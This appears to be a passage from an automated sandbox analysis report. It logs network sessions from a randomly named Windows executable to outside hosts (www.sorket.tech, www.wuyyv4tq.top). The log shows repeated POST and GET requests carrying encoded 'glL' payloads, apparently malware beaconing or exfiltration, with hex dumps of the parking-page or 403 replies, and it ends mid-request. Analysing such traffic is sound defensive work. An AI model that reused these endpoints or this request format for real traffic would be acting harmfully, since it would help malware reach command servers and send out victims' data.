                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 42 62 6f 65 36 2b 65 6c 4e 5a 59 59 6d 52 30 74 33 77 59 39 35 42 72 56 38 33 33 54 36 6c 53 57 36 37 68 79 62 47 72 53 53 61 45 39 63 33 33 66 41 4e 47 4c 74 64 73 48 4e 76 39 39 36 47 76 75 42 31 56 2b 66 6d 5a 34 39 76 58 67 55 2f 41 78 31 52 76 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                            Dec 16, 2024 22:05:23.519233942 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDFiODVmNzQtMzZhNC00ODcwLTlmYTYtNjA2MTIwYjY0YTdjIiwicGFnZV90aW1lIjoxNzM0MzgzMT


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.550012199.59.243.227802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:25.107197046 CET840OUTPOST /ul4e/ HTTP/1.1
                                                            Host: www.sorket.tech
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.sorket.tech
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.sorket.tech/ul4e/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 52 74 5a 45 68 44 39 6e 4f 38 71 42 67 2f 53 53 37 6d 4c 70 6e 56 64 45 70 6f 4b 49 54 70 34 66 38 37 56 73 32 6c 4d 46 65 51 45 32 45 67 41 72 2b 49 2b 76 64 44 32 52 69 36 50 56 68 37 34 74 68 4c 6c 7a 2b 5a 72 38 70 68 74 2f 45 65 48 53 34 68 4f 67 41 2b 69 78 52 2b 43 38 36 46 4e 4f 55 61 71 71 35 6a 47 2f 71 75 53 67 7a 44 51 76 65 54 33 44 76 68 54 48 37 59 63 30 48 4e 66 71 6b 4c 55 35 6a 4c 34 5a 68 6c 78 41 77 6d 6b 6e 33 57 53 37 36 47 33 6a 63 41 64 78 50 30 55 75 47 2b 43 4e 75 45 53 57 53 50 6b 4f 4f 65 2f 47 6b 37 6f 6e 4d 4a 32 2b 66 47 6f 38 50 64 48 44 68 64 53 71 58 56 6e 44 2f 67 6b 61 76 59 73 38 78 59 72 6f 54 59 31 41 4f 65 43 6c
                                                            Data Ascii: glL=RtZEhD9nO8qBg/SS7mLpnVdEpoKITp4f87Vs2lMFeQE2EgAr+I+vdD2Ri6PVh74thLlz+Zr8pht/EeHS4hOgA+ixR+C86FNOUaqq5jG/quSgzDQveT3DvhTH7Yc0HNfqkLU5jL4ZhlxAwmkn3WS76G3jcAdxP0UuG+CNuESWSPkOOe/Gk7onMJ2+fGo8PdHDhdSqXVnD/gkavYs8xYroTY1AOeCl
                                                            Dec 16, 2024 22:05:26.223995924 CET1236INHTTP/1.1 200 OK
                                                            date: Mon, 16 Dec 2024 21:05:25 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1110
                                                            x-request-id: 948d38a8-e37b-4978-a9cb-32cc9b734189
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==
                                                            set-cookie: parking_session=948d38a8-e37b-4978-a9cb-32cc9b734189; expires=Mon, 16 Dec 2024 21:20:26 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 42 62 6f 65 36 2b 65 6c 4e 5a 59 59 6d 52 30 74 33 77 59 39 35 42 72 56 38 33 33 54 36 6c 53 57 36 37 68 79 62 47 72 53 53 61 45 39 63 33 33 66 41 4e 47 4c 74 64 73 48 4e 76 39 39 36 47 76 75 42 31 56 2b 66 6d 5a 34 39 76 58 67 55 2f 41 78 31 52 76 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                            Dec 16, 2024 22:05:26.224059105 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQ4ZDM4YTgtZTM3Yi00OTc4LWE5Y2ItMzJjYzliNzM0MTg5IiwicGFnZV90aW1lIjoxNzM0MzgzMT


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.550013199.59.243.227802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:27.773008108 CET1857OUTPOST /ul4e/ HTTP/1.1
                                                            Host: www.sorket.tech
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.sorket.tech
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.sorket.tech/ul4e/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 52 74 5a 45 68 44 39 6e 4f 38 71 42 67 2f 53 53 37 6d 4c 70 6e 56 64 45 70 6f 4b 49 54 70 34 66 38 37 56 73 32 6c 4d 46 65 51 4d 32 45 53 34 72 76 66 69 76 63 44 32 52 38 4b 50 51 68 37 34 73 68 4c 39 33 2b 5a 57 4a 70 69 46 2f 57 49 4c 53 36 55 75 67 62 75 69 78 64 65 43 35 35 31 4d 57 55 62 62 6a 35 6a 57 2f 71 75 53 67 7a 42 49 76 4a 53 33 44 74 68 54 45 74 6f 63 43 55 64 66 4f 6b 50 35 47 6a 4c 39 73 69 56 52 41 7a 47 30 6e 6b 77 6d 37 6c 32 33 6c 64 41 64 70 50 30 59 78 47 2b 4f 42 75 45 4f 6f 53 4e 45 4f 4d 66 4f 4e 68 59 59 59 50 50 7a 54 4d 45 56 65 61 72 48 79 76 50 76 64 55 43 62 43 2f 44 30 79 71 63 73 68 77 73 36 41 50 75 39 61 42 65 33 58 6a 7a 56 65 4f 41 74 70 2b 6b 34 39 6c 76 47 50 41 6d 4c 48 62 4e 46 7a 7a 34 53 7a 44 70 73 44 46 62 31 48 4d 4f 52 4d 6a 6e 36 58 4d 51 71 46 79 50 6b 49 4c 41 54 45 76 69 2b 2f 44 74 37 76 4e 65 30 4e 54 45 33 50 38 71 59 63 32 70 39 43 6b 6d 4e 47 75 56 31 65 47 50 77 6f 53 51 61 33 48 4c 44 57 61 36 79 30 62 35 74 6d 51 57 41 4b 78 71 [TRUNCATED]
                                                            Data Ascii: glL=RtZEhD9nO8qBg/SS7mLpnVdEpoKITp4f87Vs2lMFeQM2ES4rvfivcD2R8KPQh74shL93+ZWJpiF/WILS6UugbuixdeC551MWUbbj5jW/quSgzBIvJS3DthTEtocCUdfOkP5GjL9siVRAzG0nkwm7l23ldAdpP0YxG+OBuEOoSNEOMfONhYYYPPzTMEVearHyvPvdUCbC/D0yqcshws6APu9aBe3XjzVeOAtp+k49lvGPAmLHbNFzz4SzDpsDFb1HMORMjn6XMQqFyPkILATEvi+/Dt7vNe0NTE3P8qYc2p9CkmNGuV1eGPwoSQa3HLDWa6y0b5tmQWAKxq6ClY6xQSGhnqYiXyWX84L7aXNfUqPv1Y4Uw3WfRIb8Tj5pM5Z7qLQG+hcegFAIHEsei3Hb7d+91VGs27vkzlCqU0Vemh82ppxSuL+7D37F1a4QoSteq1WwwK2jQbdw/K6I0/bzUeKYj6Tldyeu8d0iXPeeJJbjNTMc95lYZcjlEnI4+JmVNtdPd+i4O9D8AnstWWguW/0rtzpVM4cVOL+JkvG3/cM5+RfeL3IjleabGXijObelAaHzqQKlBSHdkfneXaQlBNYmGNJmffn2ogk683M6zBD5qR8wxjBQ/E8tJt03b3KvPpRuGhJEftG6Y1xdE4He+PDrV8JrTIv0FuuIjY2i8ZduhexMPGkHOHxYSmDeCUgJjjqthZ5gXtoSmuJiccr2nZZDTQb+ArBghc393n2YOX+i4SByFGqvtfjY6fSW50NN94Onl9IiUyDbtvfTEKqzx4J4ejwf1C7GSdftE9k60QiiRwHe/hmThzQejT0Pw/3YmZMRd/srALHTyZSoyEZaM9jLGbNzOdn7vBG+fWf3B5O82EGo2pKZ6JSk0Ycs44mmhQp2FJUMePddILsdqrQ1NMmOMEOMiTzm5/cT+nf+UPTQ0c/b13YWYNm4CAdp8uPNsGCy2WSu9TRzAgTxzWFTqtDW+TN8N9q0ylU1dPTH4mJG8B5T [TRUNCATED]
                                                            Dec 16, 2024 22:05:28.863082886 CET1236INHTTP/1.1 200 OK
                                                            date: Mon, 16 Dec 2024 21:05:27 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1110
                                                            x-request-id: c3717653-8c82-446f-a45c-3a0f4c33750d
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==
                                                            set-cookie: parking_session=c3717653-8c82-446f-a45c-3a0f4c33750d; expires=Mon, 16 Dec 2024 21:20:28 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 42 62 6f 65 36 2b 65 6c 4e 5a 59 59 6d 52 30 74 33 77 59 39 35 42 72 56 38 33 33 54 36 6c 53 57 36 37 68 79 62 47 72 53 53 61 45 39 63 33 33 66 41 4e 47 4c 74 64 73 48 4e 76 39 39 36 47 76 75 42 31 56 2b 66 6d 5a 34 39 76 58 67 55 2f 41 78 31 52 76 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                            Dec 16, 2024 22:05:28.863133907 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM3MTc2NTMtOGM4Mi00NDZmLWE0NWMtM2EwZjRjMzM3NTBkIiwicGFnZV90aW1lIjoxNzM0MzgzMT


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.550014199.59.243.227802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:30.437952995 CET563OUTGET /ul4e/?glL=cvxki0kBFrS2hvGq027olA1jgamEceFj1uttxlM7dB07FxcfiLStaTGfrtmHmLc0lZI/hpa9nyxgRPTa9U6Df5W0ae2c8VAHa4Pcz3SNtLaImxYBNDaekCndloRVf++j2Q==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.sorket.tech
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:05:31.538692951 CET1236INHTTP/1.1 200 OK
                                                            date: Mon, 16 Dec 2024 21:05:30 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1478
                                                            x-request-id: a85b1a56-c995-42f0-b6b9-078d13715124
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CGoM6f9ZJ6DQXXktfqjs3HD1DzyGme7EUNupt6DPBsXs2ta3YGtwrRvXoMDsIsTrdCioqcWfj3pJ2bcY1o2JyA==
                                                            set-cookie: parking_session=a85b1a56-c995-42f0-b6b9-078d13715124; expires=Mon, 16 Dec 2024 21:20:31 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 47 6f 4d 36 66 39 5a 4a 36 44 51 58 58 6b 74 66 71 6a 73 33 48 44 31 44 7a 79 47 6d 65 37 45 55 4e 75 70 74 36 44 50 42 73 58 73 32 74 61 33 59 47 74 77 72 52 76 58 6f 4d 44 73 49 73 54 72 64 43 69 6f 71 63 57 66 6a 33 70 4a 32 62 63 59 31 6f 32 4a 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CGoM6f9ZJ6DQXXktfqjs3HD1DzyGme7EUNupt6DPBsXs2ta3YGtwrRvXoMDsIsTrdCioqcWfj3pJ2bcY1o2JyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                            Dec 16, 2024 22:05:31.538803101 CET931INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTg1YjFhNTYtYzk5NS00MmYwLWI2YjktMDc4ZDEzNzE1MTI0IiwicGFnZV90aW1lIjoxNzM0MzgzMT


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.550015156.226.63.13802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:37.455231905 CET823OUTPOST /mrxb/ HTTP/1.1
                                                            Host: www.wuyyv4tq.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.wuyyv4tq.top
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.wuyyv4tq.top/mrxb/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 41 69 68 65 4e 53 4b 71 33 76 79 41 5a 31 4a 7a 30 66 50 56 59 42 37 6f 56 76 67 56 77 2b 55 6d 57 7a 70 44 6c 79 30 68 75 63 65 57 7a 38 4b 4a 37 41 39 7a 32 33 62 45 34 6a 7a 43 74 48 78 65 48 31 65 58 6e 70 4d 42 65 71 50 62 36 45 76 4a 7a 4c 55 77 52 33 59 68 51 2b 6b 75 42 69 4c 6c 32 42 51 38 79 55 71 5a 65 38 50 46 69 79 54 49 30 72 4a 78 52 79 67 2b 52 62 49 61 2f 2f 68 33 63 31 55 75 68 62 72 4b 79 47 61 41 50 2f 47 71 61 47 4c 77 78 6b 4a 67 79 6a 55 56 66 76 44 2f 4b 2f 69 38 2b 51 2f 36 2f 46 42 74 38 59 6a 6c 66 49 73 61 52 52 30 31 2f 72 45 58 69 33 62 69 65 31 35 56 54 54 67 3d
                                                            Data Ascii: glL=AiheNSKq3vyAZ1Jz0fPVYB7oVvgVw+UmWzpDly0huceWz8KJ7A9z23bE4jzCtHxeH1eXnpMBeqPb6EvJzLUwR3YhQ+kuBiLl2BQ8yUqZe8PFiyTI0rJxRyg+RbIa//h3c1UuhbrKyGaAP/GqaGLwxkJgyjUVfvD/K/i8+Q/6/FBt8YjlfIsaRR01/rEXi3bie15VTTg=
                                                            Dec 16, 2024 22:05:38.974565983 CET691INHTTP/1.1 403 Forbidden
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:05:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.550016156.226.63.13802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:40.119111061 CET843OUTPOST /mrxb/ HTTP/1.1
                                                            Host: www.wuyyv4tq.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.wuyyv4tq.top
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.wuyyv4tq.top/mrxb/
